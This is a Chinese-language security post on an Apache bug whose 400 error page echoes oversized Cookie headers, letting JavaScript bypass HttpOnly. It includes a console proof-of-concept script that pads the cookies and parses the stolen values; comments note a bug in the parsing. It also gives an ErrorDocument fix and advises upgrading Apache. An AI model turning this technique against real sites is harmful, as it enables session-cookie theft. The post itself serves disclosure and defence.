很多程序以及一些商业或者成熟开源的CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户的cookie,从而降低XSS的危害;而下面介绍的这个Apache问题刚好可以用来绕过cookie的HttpOnly属性。

用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:

// http://www.exploit-db.com/exploits/18442
/**
 * Writes ten oversized cookies (xss0 … xss9, 819 bytes each) to
 * document.cookie, or expires them again when `good` is truthy. The
 * oversized Cookie header is what makes the unpatched Apache versions the
 * post describes answer with a 400 page that echoes the request headers.
 *
 * Browser-only: the only effect is on document.cookie; nothing is returned.
 *
 * @param {boolean} [good] - truthy to expire the cookies, falsy to set them.
 */
function setCookies(good) {
  // 819 copies of "x" used as the cookie value.
  var filler = new Array(820).join("x");

  for (var idx = 0; idx < 10; idx++) {
    var name = "xss" + idx;
    var value;
    if (good) {
      // Expiry one millisecond in the past removes the cookie.
      var pastDate = new Date(Date.now() - 1).toUTCString();
      value = name + "=;expires=" + pastDate + "; path=/;";
    } else {
      value = name + "=" + filler + ";path=/";
    }
    document.cookie = value;
  }
}
/**
 * Sends a same-origin GET while the oversized cookies written by setCookies
 * are attached. If the server answers 400 and echoes the request headers
 * inside a <pre> block, the echoed Cookie header is parsed into a
 * name/value object, the padding cookies are expired again, and the result
 * is shown with alert().
 *
 * Browser-only: relies on XMLHttpRequest, alert and (through setCookies)
 * document.cookie. Returns nothing; all work happens in the
 * readystatechange handler.
 */
function makeRequest() {
  setCookies();

  // readystatechange handler; closes over the `xhr` declared further down.
  function parseCookies() {
    var collected = {};

    // Only a completed 400 response is of interest.
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }

    // Flatten the body and pick out the <pre> content.
    var flatBody = xhr.responseText.replace(/\r|\n/g, '');
    var preMatch = flatBody.match(/<pre>(.+)<\/pre>/);
    // NOTE(review): a body without <pre> leaves preMatch null and this line
    // throws — same as the original listing.
    if (preMatch.length) {
      var header = preMatch[1].replace("Cookie: ", "");
      // Drop the padding cookies, then split the remainder on ';'.
      var pairs = header.replace(/xss\d=x+;?/g, '').split(/;/g);
      for (var k = 0; k < pairs.length; k++) {
        // NOTE(review): `pairs` is an array, so .split is not a function and
        // this throws a TypeError before anything is stored — kept as in the
        // original listing.
        var nameValue = pairs.split('=', 2);
        collected[nameValue[0]] = nameValue[1];
      }
    }

    // Expire the padding cookies again.
    setCookies(true);
    alert(JSON.stringify(collected));
  }

  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: run the request once the console snippet is pasted.
makeRequest();
你就能看见华丽丽的400错误页面中包含着cookie信息。

下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案:

Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message 输出一个简单生硬的错误信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部URL

经测试,对于400错误只有方式2有效,返回包不会再包含cookie内容。

Apache配置:

ErrorDocument 400 "security test"

当然,升级Apache到最新版本也可以:)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html
